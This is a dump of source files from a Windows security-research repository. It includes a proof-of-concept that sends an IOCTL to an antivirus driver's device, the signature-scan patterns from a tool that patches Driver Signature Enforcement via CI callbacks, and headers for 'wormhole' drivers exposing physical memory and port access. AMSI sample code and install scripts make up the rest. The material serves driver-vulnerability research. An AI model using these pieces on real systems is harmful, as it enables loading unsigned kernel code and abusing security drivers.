21 | {1B740B58-E395-40B5-8345-1A7265DD727D}.Release|x64.Build.0 = Release|x64
22 | {1B740B58-E395-40B5-8345-1A7265DD727D}.Release|x86.ActiveCfg = Release|Win32
23 | {1B740B58-E395-40B5-8345-1A7265DD727D}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {8796A7D2-69DC-4BD8-B6E9-779ACC6AE4CF}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/source/SecTrash/secureaplus.c:
--------------------------------------------------------------------------------
1 | #pragma warning(disable: 4005)
2 |
3 | #include
4 | #include
5 | #include
6 | #include "ntos.h"
7 |
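/*
 * Thin wrapper over NtDeviceIoControlFile.
 *
 * Sends IoControlCode to DeviceHandle with the given input/output buffers,
 * passing NULL for the event, APC routine and APC context, and returns the
 * NTSTATUS of the call unchanged.
 *
 * The IO_STATUS_BLOCK is a local that is discarded on return, so the caller
 * does not learn how many bytes the driver wrote to OutputBuffer.
 * NOTE(review): because the status block lives on this stack frame, the
 * handle should be one on which the request completes before the call
 * returns - confirm at the call sites.
 */
NTSTATUS CallDriver(
    _In_ HANDLE DeviceHandle,
    _In_ ULONG IoControlCode,
    _In_opt_ PVOID InputBuffer,
    _In_opt_ ULONG InputBufferLength,
    _In_opt_ PVOID OutputBuffer,
    _In_opt_ ULONG OutputBufferLength)
{
    IO_STATUS_BLOCK ioStatus;

    return NtDeviceIoControlFile(DeviceHandle,
        NULL,
        NULL,
        NULL,
        &ioStatus,
        IoControlCode,
        InputBuffer,
        InputBufferLength,
        OutputBuffer,
        OutputBufferLength);
}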
31 |
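/*
 * Opens the \\.\SAScan device, sends one IOCTL (0x9C40E404) with no input or
 * output buffer through CallDriver, and prints the resulting NTSTATUS.
 *
 * Returns -1 when the device cannot be opened (release builds only; debug
 * builds carry on with the invalid handle), 0 otherwise.
 */
int main()
{
    NTSTATUS ntStatus;
    HANDLE deviceHandle;

    deviceHandle = CreateFile(TEXT("\\\\.\\SAScan"),
        GENERIC_READ | GENERIC_WRITE,
        0,
        NULL,
        OPEN_EXISTING,
        0,
        NULL);

    if (deviceHandle == INVALID_HANDLE_VALUE) {
        printf_s("[!] Unable to open device\r\n");
#ifndef _DEBUG
        return -1;
#endif
    }
    else {
        printf_s("[+] SAScan device opened\r\n");
    }

    ntStatus = CallDriver(deviceHandle,
        0x9C40E404,
        NULL,
        0,
        NULL,
        0);

    printf_s("[~] (NTSTATUS 0x%lx)\r\n", ntStatus);

    system("pause");

    /* Debug builds reach this point even when the open failed; only close a
       handle that was actually obtained. */
    if (deviceHandle != INVALID_HANDLE_VALUE)
        CloseHandle(deviceHandle);

    return 0;
}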
67 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/global.h:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT AUTHORS, 2016 - 2019
4 | *
5 | * TITLE: GLOBAL.H
6 | *
7 | * VERSION: 1.05
8 | *
9 | * DATE: 22 Jan 2019
10 | *
11 | * Common header file for the program support routines.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 | #pragma once
20 |
21 | #if !defined UNICODE
22 | #error ANSI build is not supported
23 | #endif
24 |
25 | #pragma warning(disable: 4005) // macro redefinition
26 | #pragma warning(disable: 4152) // nonstandard extension, function/data pointer conversion in expression
27 | #pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union
28 |
29 |
30 | #if defined (_MSC_VER)
31 | #if (_MSC_VER >= 1900)
32 | #ifdef _DEBUG
33 | #pragma comment(lib, "vcruntimed.lib")
34 | #pragma comment(lib, "ucrtd.lib")
35 | #else
36 | #pragma comment(lib, "libucrt.lib")
37 | #pragma comment(lib, "libvcruntime.lib")
38 | #endif
39 | #endif
40 | #endif
41 |
42 | #include
43 | #include
44 | #include "vbox.h"
45 | #include "ntdll/ntos.h"
46 | #include "minirtl/minirtl.h"
47 | #include "minirtl/cmdline.h"
48 | #include "hde/hde64.h"
49 | #include "cui/cui.h"
50 | #include "sup.h"
51 | #include "instdrv.h"
52 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PhyMem/driver/phymem.h:
--------------------------------------------------------------------------------
1 | #ifndef __PHYMEM_H
2 | #define __PHYMEM_H
3 |
//
// Control codes shared between the driver and its user-mode callers.
// FILE_DEVICE_PHYMEM (0x8000) and the function codes 0x800-0x805 lie in the
// ranges left for vendor-defined device types and functions.
//
// NOTE(review): every code is declared with FILE_ANY_ACCESS, so the I/O
// manager does not require the caller's handle to carry read or write access
// for these requests. Who can reach them therefore depends on the security
// descriptor of the device object and on any checks in the driver's dispatch
// routine, neither of which is visible in this header - confirm.
//
#define FILE_DEVICE_PHYMEM 0x8000

// Map / unmap requests; buffers are copied by the I/O manager (METHOD_BUFFERED).
#define IOCTL_PHYMEM_MAP \
    CTL_CODE(FILE_DEVICE_PHYMEM, 0x800,\
    METHOD_BUFFERED, FILE_ANY_ACCESS)

#define IOCTL_PHYMEM_UNMAP \
    CTL_CODE(FILE_DEVICE_PHYMEM, 0x801,\
    METHOD_BUFFERED, FILE_ANY_ACCESS)

// I/O port read / write requests (METHOD_BUFFERED).
#define IOCTL_PHYMEM_GETPORT \
    CTL_CODE(FILE_DEVICE_PHYMEM, 0x802,\
    METHOD_BUFFERED, FILE_ANY_ACCESS)

#define IOCTL_PHYMEM_SETPORT \
    CTL_CODE(FILE_DEVICE_PHYMEM, 0x803,\
    METHOD_BUFFERED, FILE_ANY_ACCESS)

// PCI configuration read / write requests (METHOD_OUT_DIRECT).
#define IOCTL_PHYMEM_GETPCI \
    CTL_CODE(FILE_DEVICE_PHYMEM, 0x804,\
    METHOD_OUT_DIRECT, FILE_ANY_ACCESS)

#define IOCTL_PHYMEM_SETPCI \
    CTL_CODE(FILE_DEVICE_PHYMEM, 0x805,\
    METHOD_OUT_DIRECT, FILE_ANY_ACCESS)
29 |
// Address/size pair for the map and unmap requests (presumably
// IOCTL_PHYMEM_MAP / IOCTL_PHYMEM_UNMAP; the pairing is inferred from the
// names).
// NOTE(review): pvAddr is pointer-sized, so the layout of this structure
// differs between 32-bit and 64-bit builds of caller and driver, and a 32-bit
// build cannot express a physical address above 4 GB. Whether and how the
// driver bounds the address/size pair it receives is not visible in this
// header.
typedef struct tagPHYMEM_MEM
{
    PVOID pvAddr; //physical addr when mapping, virtual addr when unmapping
    ULONG dwSize; //memory size to map or unmap
} PHYMEM_MEM, *PPHYMEM_MEM;
35 |
36 | typedef struct tagPHYMEM_PORT
37 | {
38 | ULONG dwPort; //port number: 0-0xFFFF
39 | ULONG dwSize; //must be 1, 2, 4
40 | ULONG dwValue; //new value to set
41 | } PHYMEM_PORT, *PPHYMEM_PORT;
42 |
43 | typedef struct tagPHYMEM_PCI
44 | {
45 | ULONG dwBusNum; //bus number: 0-255
46 | ULONG dwDevNum; //device number: 0-31
47 | ULONG dwFuncNum; //function number: 0-7
48 | ULONG dwRegOff; //register offset: 0-255
49 | ULONG dwBytes; //bytes to read or write
50 | } PHYMEM_PCI, *PPHYMEM_PCI;
51 |
52 | #endif //__PHYMEM_H
53 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PhyMem/pmdll/phymem.h:
--------------------------------------------------------------------------------
1 | #ifndef __PHYMEM_H
2 | #define __PHYMEM_H
3 |
//
// User-mode copy of the driver's control codes. The values here have to stay
// identical to those in driver/phymem.h, since both sides compute the code
// from the same CTL_CODE arguments.
//
// NOTE(review): every code is declared with FILE_ANY_ACCESS, so no read or
// write access is required on the handle used to send these requests; any
// restriction on callers has to come from the device object's security
// descriptor or from the driver itself, which this header does not show.
//
#define FILE_DEVICE_PHYMEM 0x8000

#define IOCTL_PHYMEM_MAP \
    CTL_CODE(FILE_DEVICE_PHYMEM, 0x800,\
    METHOD_BUFFERED, FILE_ANY_ACCESS)

#define IOCTL_PHYMEM_UNMAP \
    CTL_CODE(FILE_DEVICE_PHYMEM, 0x801,\
    METHOD_BUFFERED, FILE_ANY_ACCESS)

#define IOCTL_PHYMEM_GETPORT \
    CTL_CODE(FILE_DEVICE_PHYMEM, 0x802,\
    METHOD_BUFFERED, FILE_ANY_ACCESS)

#define IOCTL_PHYMEM_SETPORT \
    CTL_CODE(FILE_DEVICE_PHYMEM, 0x803,\
    METHOD_BUFFERED, FILE_ANY_ACCESS)

#define IOCTL_PHYMEM_GETPCI \
    CTL_CODE(FILE_DEVICE_PHYMEM, 0x804,\
    METHOD_OUT_DIRECT, FILE_ANY_ACCESS)

#define IOCTL_PHYMEM_SETPCI \
    CTL_CODE(FILE_DEVICE_PHYMEM, 0x805,\
    METHOD_OUT_DIRECT, FILE_ANY_ACCESS)
29 |
30 | typedef struct tagPHYMEM_MEM
31 | {
32 | PVOID pvAddr; //physical addr when mapping, virtual addr when unmapping
33 | ULONG dwSize; //memory size to map or unmap
34 | } PHYMEM_MEM, *PPHYMEM_MEM;
35 |
36 | typedef struct tagPHYMEM_PORT
37 | {
38 | ULONG dwPort; //port number: 0-0xFFFF
39 | ULONG dwSize; //must be 1, 2, 4
40 | ULONG dwValue; //new value to set
41 | } PHYMEM_PORT, *PPHYMEM_PORT;
42 |
43 | typedef struct tagPHYMEM_PCI
44 | {
45 | ULONG dwBusNum; //bus number: 0-255
46 | ULONG dwDevNum; //device number: 0-31
47 | ULONG dwFuncNum; //function number: 0-7
48 | ULONG dwRegOff; //register offset: 0-255
49 | ULONG dwBytes; //bytes to read or write
50 | } PHYMEM_PCI, *PPHYMEM_PCI;
51 |
52 | #endif //__PHYMEM_H
53 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiClient/AmsiClient.cpp:
--------------------------------------------------------------------------------
1 | #include "pch.h"
2 | #include
3 | #include
4 |
5 | #pragma comment(lib, "amsi.lib")
6 |
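// Minimal AMSI client: initializes COM and AMSI, opens a session, submits one
// fixed buffer for scanning and prints whether the result counts as malware.
//
// Returns 0 after a completed scan, -1 if COM initialization fails and -2 if
// any AMSI call fails. Whatever was acquired before a failure (COM, the AMSI
// context, the session) is released on every path.
int main()
{
    std::cout << "Hello World!\n";

    HRESULT hr = CoInitializeEx(0, COINIT_MULTITHREADED);
    if (FAILED(hr)) {
        std::cout << "CoInitializeEx error = " << std::hex << hr << "\n";
        return -1;
    }

    int exitCode = -2;
    HAMSICONTEXT amsiContext = nullptr;
    HAMSISESSION amsiSession = nullptr;

    hr = AmsiInitialize(L"Amsi Scanner", &amsiContext);
    if (FAILED(hr)) {
        std::cout << "AmsiInitialize error = " << std::hex << hr << "\n";
    }
    else {
        hr = AmsiOpenSession(amsiContext, &amsiSession);
        if (FAILED(hr)) {
            std::cout << "AmsiOpenSession error = " << std::hex << hr << "\n";
        }
        else {
            UCHAR ScanBuffer[] = "Scanned buffer";
            AMSI_RESULT ScanResult;

            // sizeof() counts the terminating NUL, so it is part of the
            // content handed to the provider.
            hr = AmsiScanBuffer(amsiContext, ScanBuffer, sizeof(ScanBuffer), L"ScanContentName", amsiSession, &ScanResult);
            if (FAILED(hr)) {
                std::cout << "AmsiScanBuffer error = " << std::hex << hr << "\n";
            }
            else {
                if (AmsiResultIsMalware(ScanResult)) {
                    std::cout << "Malware detected." << "\n";
                }
                else {
                    std::cout << "Not detected." << "\n";
                }
                exitCode = 0;
            }

            AmsiCloseSession(amsiContext, amsiSession);
        }

        AmsiUninitialize(amsiContext);
    }

    CoUninitialize();
    return exitCode;
}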
53 |
54 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/se_patterns.h:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT AUTHORS, 2016 - 2019
4 | *
5 | * TITLE: SE_PATTERNS.H
6 | *
7 | * VERSION: 1.05
8 | *
9 | * DATE: 22 Jan 2019
10 | *
11 | * Header with search patterns used by DSEPatch.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 |
20 | #pragma once
21 |
22 |
/*+++

SeCiCallbacks search patterns

NOTE(review): the arrays below are defined (not merely declared) in a header
and are neither static nor const. #pragma once only prevents repeated
inclusion within one translation unit, so including this header from more
than one source file produces duplicate external definitions at link time.

+++*/

//Windows 10 TH1/TH2
BYTE SeCiCallbacksPattern_10240_10586[] = { 0x48, 0x83, 0xEC, 0x20, 0xBB, 0x98, 0x00, 0x00, 0x00 };

//Windows 10 RS1
BYTE SeCiCallbacksPattern_14393[] = { 0x48, 0x83, 0xEC, 0x20, 0xBB, 0xB0, 0x00, 0x00, 0x00 };

//Windows 10 RS2/RS3
BYTE SeCiCallbacksPattern_15063_16299[] = { 0x48, 0x83, 0xEC, 0x20, 0xBB, 0xC0, 0x00, 0x00, 0x00 };

//Windows 10 RS4/RS5
BYTE SeCiCallbacksPattern_17134_17763[] = { 0x48, 0x83, 0xEC, 0x20, 0xBB, 0xD0, 0x00, 0x00, 0x00 };

//Windows 8/8.1
BYTE SeCiCallbacksPattern_9200_9600[] = { 0x48, 0x83, 0xEC, 0x20, 0xBF, 0x06, 0x00, 0x00, 0x00 };

BYTE SeCiCallbacksMatchingPattern[] = { 0x48, 0x8D, 0x0D };

//Windows 7
BYTE g_CiCallbacksPattern_7601[] = { 0x8D, 0x7B, 0x06, 0x48, 0x89, 0x05 };
BYTE g_CiCallbacksMatchingPattern[] = { 0x48, 0x89, 0x05 };
49 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Misc
2 |
3 | ### Miscellaneous Code and Docs
4 |
5 | docs
6 | * docs (mostly for historical purposes)
7 |
8 | source\ApiSetSchemaView
9 | * Windows ApiSetSchema Viewer (V2, V4, V6)
10 |
11 | source\StripDebug
12 | * Removes debug information left by VisualStudio 2015+
13 |
14 | source\AMSI
15 | * AMSI related experiments
16 | * source\AMSI\AmsiProviderATL
17 | AMSI provider client/server written in C++ using ATL
18 | * source\AMSI\AmsiProviderC
19 | AMSI provider server written in C (works with client from ATL version)
20 |
21 | source\IntelNal
22 | * Intel QV Linux kernel driver (upload for quick references)
23 |
24 | source\ROS
25 | * ReactOS related code
26 | * source\ROS\win32u
27 | ReactOS win32u dll (0.4.10 - 0.4.14)
28 | * source\ROS\srvany2
29 | Run application as service
30 |
31 | source\SecTrash
32 | * Various AV/Security bugs and related trash found in the beginning of 2020
33 |
34 | source\WormholeDrivers
35 | * Collection of "wormhole" open source drivers, i.e. drivers that hand user-mode callers access to physical memory and I/O ports; they are widely used by hardware vendors, sometimes in unmodified state
36 |
37 | source\DSEPatch
38 | * DSE patch based on CI callbacks modification, see dsepatch\readme for more info
39 |
40 | source\wdextract (for a more advanced version visit https://github.com/hfiref0x/wdextract)
41 | * Extract Windows Defender database from vdm files and unpack it
42 |
43 | source\DrvTools
44 | * Auxiliary utility to work with Windows Drivers
45 |
46 | source\NtCall64_LogParser
47 | * Binary log parser for NTCALL64 v2+
48 |
49 | # Authors
50 | * (c) Daniloff & Co
51 | * (c) Intel QV authors
52 | * (c) PHYMEM, MAPMEM, WINIO, WINRING0 authors
53 | * (c) hfiref0x tools/source 2015 - 2025, hfiref0x
54 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScanPS/AmsiScanPS.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {d4e6d057-7f5b-4186-9809-ee200840bfe8}
6 | False
7 |
8 |
9 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
10 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
11 |
12 |
13 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
14 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
15 |
16 |
17 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
18 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
19 |
20 |
21 |
22 |
23 | Source Files
24 |
25 |
26 |
27 |
28 | Generated Files
29 |
30 |
31 | Generated Files
32 |
33 |
34 | Generated Files
35 |
36 |
37 |
--------------------------------------------------------------------------------
/source/ApiSetSchema/1.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
9 | ApiSetSchemaView
10 |
11 |
12 |
13 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
40 |
41 |
42 |
43 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINRING0/dll/vxd/ctrl.asm:
--------------------------------------------------------------------------------
1 | ;-----------------------------------------------------------------------------
2 | ; Author : hiyohiyo
3 | ; Mail : hiyohiyo@crystalmark.info
4 | ; Web : http://openlibsys.org/
5 | ; License : The modified BSD license
6 | ;
7 | ; Copyright 2007 hiyohiyo, All rights reserved.
8 | ;-----------------------------------------------------------------------------
9 |
10 | WIN40COMPAT EQU 1
11 | PAGE 58,132
12 |
13 | .386p
14 | .xlist
15 | include vmm.inc
16 | .list
17 |
18 | ;============================================================================
19 | ; V I R T U A L D E V I C E D E C L A R A T I O N
20 | ;============================================================================
21 |
22 | DECLARE_VIRTUAL_DEVICE OPENLS, 1, 0, OPENLS_Control, Undefined_Device_ID, \
23 | UNDEFINED_INIT_ORDER, 0 ,0
24 |
25 | ;============================================================================
26 | ; OPENLS_Control
27 | ;============================================================================
28 |
29 | VxD_LOCKED_CODE_SEG
30 |
31 | BeginProc OPENLS_Control ; VxD control procedure: routes system control messages to their handlers
32 | Control_Dispatch SYS_DYNAMIC_DEVICE_INIT, Dynamic_Init, sCall ; dynamic load is handled by Dynamic_Init
33 | Control_Dispatch SYS_DYNAMIC_DEVICE_EXIT, Dynamic_Exit, sCall ; dynamic unload is handled by Dynamic_Exit
34 | Control_Dispatch W32_DEVICEIOCONTROL, W32_DeviceIOControl,\
35 | sCall, ; Win32 DeviceIoControl requests go to W32_DeviceIOControl; NOTE(review): the argument list after "sCall," looks lost in this listing - confirm against the original file
36 | clc ; any message not dispatched above returns with carry clear
37 | ret
38 | EndProc OPENLS_Control
39 |
40 | public C Exec_VxD_Int_rap ; exported with C naming so the C side of the VxD can call it
41 | Exec_VxD_Int_rap proc ; thin wrapper around the VMM Exec_VxD_Int service for interrupt 1Ah
42 | push dword ptr 1ah ; interrupt number handed to Exec_VxD_Int
43 | VmmCall Exec_VxD_Int ; presumably the register state for the interrupt is prepared by the caller - verify at the call site
44 | ret
45 | Exec_VxD_Int_rap endp
46 |
47 | VxD_LOCKED_CODE_ENDS
48 |
49 | end
50 |
--------------------------------------------------------------------------------
/source/IntelNal/src/nalinstall:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 |
3 | # Copyright(c) 1999 - 2013 Intel Corporation. All rights reserved.
4 | #
5 | # This program is free software; you can redistribute it and/or modify
6 | # it under the terms of version 2 of the GNU General Public License as
7 | # published by the Free Software Foundation.
8 | #
9 | # This program is distributed in the hope that it will be useful, but
10 | # WITHOUT ANY WARRANTY; without even the implied warranty of
11 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
12 | # General Public License for more details.
13 | #
14 | # You should have received a copy of the GNU General Public License
15 | # along with this program; if not, write to the Free Software
16 | # Foundation, Inc., 51 Franklin St - Fifth Floor, Boston, MA 02110-1301 USA.
17 | # The full GNU General Public License is included in this distribution
18 | # in the file called LICENSE.GPL.
19 | #
20 | # Contact Information:
21 | # e1000-devel Mailing List
22 | # Intel Corporation, 5200 N.E. Elam Young Parkway, Hillsboro, OR 97124-6497
23 |
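# Directory holding the built driver: first argument, or the current
# directory when no argument is given.
if [ "$1" = "" ]
then
    SOURCE_DIR=$PWD
else
    SOURCE_DIR=$1
fi

MachineType=$(uname -i)
KernelVersion=$(uname -r)

# First three characters of the kernel release, with 2.5 and 2.6 both
# reported as 2.6; only "2.4" selects the old .o module format below.
K_VERSION=$(uname -r | cut -c1-3 | sed 's/2\.[56]/2\.6/')

DriverName=iqvlinux
if [ "$K_VERSION" = "2.4" ]
then
    DriverFileName=$DriverName.o
else
    DriverFileName=$DriverName.ko
fi

ModuleDir=/lib/modules/$KernelVersion/kernel/drivers/net

# This script is meant to run with root privileges and deletes a kernel
# module, so stop before the rm if there is nothing to install in its place.
if [ ! -f "$SOURCE_DIR/$DriverFileName" ]
then
    echo "Driver file not found: $SOURCE_DIR/$DriverFileName" >&2
    exit 1
fi

# Every expansion is quoted so that a source path containing spaces or
# glob characters is passed to rm/cp as one literal argument.
rm -f "$ModuleDir/$DriverFileName"
if ! cp "$SOURCE_DIR/$DriverFileName" "$ModuleDir"
then
    # Do not claim success when the module was not copied.
    echo "Failed to copy $DriverFileName to $ModuleDir" >&2
    exit 1
fi
# Install the node and driver
echo "Try and unload the old driver..."
rmmod -s "$DriverName"
echo "Installed!!"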
50 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PhyMem/driver/AccessBus.c:
--------------------------------------------------------------------------------
1 | /*++
2 | access pci bus configuration
3 | --*/
4 |
5 | #include
6 | #include
7 | #include "DebugPrint.h"
8 |
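/*
 * GetBusInterface - gets the bus interface standard information from the PDO.
 *
 * Builds an IRP_MJ_PNP / IRP_MN_QUERY_INTERFACE request for
 * GUID_PCI_BUS_INTERFACE_STANDARD, sends it to pcifido and, if the request
 * is pended, waits for it to complete.
 *
 * pcifido      - device object the query is sent to.
 * busInterface - caller-supplied structure that the lower driver fills in.
 *
 * Returns STATUS_UNSUCCESSFUL when pcifido is NULL, STATUS_INVALID_PARAMETER
 * when busInterface is NULL, STATUS_INSUFFICIENT_RESOURCES when no IRP could
 * be built, otherwise the status reported for the request.
 *
 * NOTE(review): the synchronous IRP and the untimed wait imply the caller is
 * at PASSIVE_LEVEL - confirm at the call sites. On success the returned
 * interface is presumably referenced and should be released through its
 * InterfaceDereference routine when no longer needed - verify.
 */
NTSTATUS GetBusInterface(IN PDEVICE_OBJECT pcifido,
                         OUT PPCI_BUS_INTERFACE_STANDARD busInterface)
{
    KEVENT event;
    NTSTATUS ntStatus;
    PIRP irp;
    IO_STATUS_BLOCK ioStatus;
    PIO_STACK_LOCATION irpStack;

    if (pcifido==NULL)
        return STATUS_UNSUCCESSFUL;

    /* The pointer is handed to the lower driver as the buffer to fill in,
       so a NULL here must be rejected before the request is built. */
    if (busInterface==NULL)
        return STATUS_INVALID_PARAMETER;

    KeInitializeEvent(&event, NotificationEvent, FALSE);

    irp=IoBuildSynchronousFsdRequest(IRP_MJ_PNP,
                                     pcifido,
                                     NULL,
                                     0,
                                     NULL,
                                     &event,
                                     &ioStatus);

    if (irp==NULL)
    {
        return STATUS_INSUFFICIENT_RESOURCES;
    }

    irpStack=IoGetNextIrpStackLocation(irp);
    irpStack->MinorFunction=IRP_MN_QUERY_INTERFACE;
    irpStack->Parameters.QueryInterface.InterfaceType=(LPGUID)&GUID_PCI_BUS_INTERFACE_STANDARD;
    irpStack->Parameters.QueryInterface.Size=sizeof(PCI_BUS_INTERFACE_STANDARD);
    irpStack->Parameters.QueryInterface.Version=PCI_BUS_INTERFACE_STANDARD_VERSION;
    irpStack->Parameters.QueryInterface.Interface=(PINTERFACE)busInterface;
    irpStack->Parameters.QueryInterface.InterfaceSpecificData=NULL;

    //initialize the status to error in case the bus driver does not
    //set it correctly.
    irp->IoStatus.Status=STATUS_NOT_SUPPORTED ;

    ntStatus=IoCallDriver(pcifido, irp);

    if (ntStatus==STATUS_PENDING)
    {
        /* The request was queued: block until the event passed to
           IoBuildSynchronousFsdRequest is signalled, then take the final
           status from the I/O status block. */
        KeWaitForSingleObject(&event, Executive, KernelMode, FALSE, NULL);

        ntStatus=ioStatus.Status;
    }

    return ntStatus;
}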
60 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/hde/pstdint.h:
--------------------------------------------------------------------------------
1 | /*
2 | * MinHook - The Minimalistic API Hooking Library for x64/x86
3 | * Copyright (C) 2009-2015 Tsuda Kageyu. All rights reserved.
4 | *
5 | * Redistribution and use in source and binary forms, with or without
6 | * modification, are permitted provided that the following conditions
7 | * are met:
8 | *
9 | * 1. Redistributions of source code must retain the above copyright
10 | * notice, this list of conditions and the following disclaimer.
11 | * 2. Redistributions in binary form must reproduce the above copyright
12 | * notice, this list of conditions and the following disclaimer in the
13 | * documentation and/or other materials provided with the distribution.
14 | *
15 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR
16 | * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
17 | * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
18 | * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
19 | * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
20 | * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
21 | * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
22 | * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
23 | * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
24 | * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
25 | */
26 |
27 | #pragma once
28 |
29 | #include
30 |
31 | // Integer types for HDE.
32 | typedef INT8 int8_t;
33 | typedef INT16 int16_t;
34 | typedef INT32 int32_t;
35 | typedef INT64 int64_t;
36 | typedef UINT8 uint8_t;
37 | typedef UINT16 uint16_t;
38 | typedef UINT32 uint32_t;
39 | typedef UINT64 uint64_t;
40 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScan.cpp:
--------------------------------------------------------------------------------
1 | // AmsiScan.cpp : Implementation of DLL Exports.
2 |
3 |
4 | #include "stdafx.h"
5 | #include "resource.h"
6 | #include "AmsiScan_i.h"
7 | #include "dllmain.h"
8 |
9 |
10 | using namespace ATL;
11 |
// Lets OLE ask whether this DLL is no longer in use; the answer comes
// from the ATL module object.
_Use_decl_annotations_
STDAPI DllCanUnloadNow(void)
{
    const HRESULT hrCanUnload = _AtlModule.DllCanUnloadNow();
    return hrCanUnload;
}
18 |
// Hands back the class factory for the requested CLSID/IID pair by
// forwarding the call to the ATL module object.
_Use_decl_annotations_
STDAPI DllGetClassObject(_In_ REFCLSID rclsid, _In_ REFIID riid, _Outptr_ LPVOID* ppv)
{
    const HRESULT hrFactory = _AtlModule.DllGetClassObject(rclsid, riid, ppv);
    return hrFactory;
}
25 |
// DllRegisterServer - writes this server's entries to the system registry
// (object, typelib and all interfaces in the typelib).
_Use_decl_annotations_
STDAPI DllRegisterServer(void)
{
    return _AtlModule.DllRegisterServer();
}
34 |
// DllUnregisterServer - deletes this server's entries from the system registry.
_Use_decl_annotations_
STDAPI DllUnregisterServer(void)
{
    return _AtlModule.DllUnregisterServer();
}
42 |
// DllInstall - registers (bInstall != 0) or unregisters the server.
// A command line of "user" switches ATL to per-user registration first.
// Returns the HRESULT of the registration or unregistration call.
STDAPI DllInstall(BOOL bInstall, _In_opt_ LPCWSTR pszCmdLine)
{
    static const wchar_t szUserSwitch[] = L"user";

    // _countof counts the terminating NUL as well, so the compare covers the
    // whole switch: only the exact word matches, case-insensitively.
    const bool perUser =
        pszCmdLine != nullptr &&
        _wcsnicmp(pszCmdLine, szUserSwitch, _countof(szUserSwitch)) == 0;
    if (perUser)
    {
        ATL::AtlSetPerUserRegistration(true);
    }

    if (!bInstall)
    {
        return DllUnregisterServer();
    }

    const HRESULT hrRegister = DllRegisterServer();
    if (FAILED(hrRegister))
    {
        // Roll back whatever a failed registration left behind.
        DllUnregisterServer();
    }
    return hrRegister;
}
72 |
73 |
74 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiProvider.h:
--------------------------------------------------------------------------------
1 | // AmsiProvider.h : Declaration of the CAmsiProvider
2 |
3 | #pragma once
4 | #include "resource.h" // main symbols
5 |
6 |
7 |
8 | #include "AmsiScan_i.h"
9 | #include
10 |
11 |
12 | #if defined(_WIN32_WCE) && !defined(_CE_DCOM) && !defined(_CE_ALLOW_SINGLE_THREADED_OBJECTS_IN_MTA)
13 | #error "Single-threaded COM objects are not properly supported on Windows CE platform, such as the Windows Mobile platforms that do not include full DCOM support. Define _CE_ALLOW_SINGLE_THREADED_OBJECTS_IN_MTA to force ATL to support creating single-thread COM object's and allow use of it's single-threaded COM object implementations. The threading model in your rgs file was set to 'Free' as that is the only threading model supported in non DCOM Windows CE platforms."
14 | #endif
15 |
16 | using namespace ATL;
17 |
18 |
19 | // CAmsiProvider: ATL COM object that implements IAntimalwareProvider (Scan, CloseSession, DisplayName)
20 |
21 | class ATL_NO_VTABLE CAmsiProvider :
22 | public CComObjectRootEx,
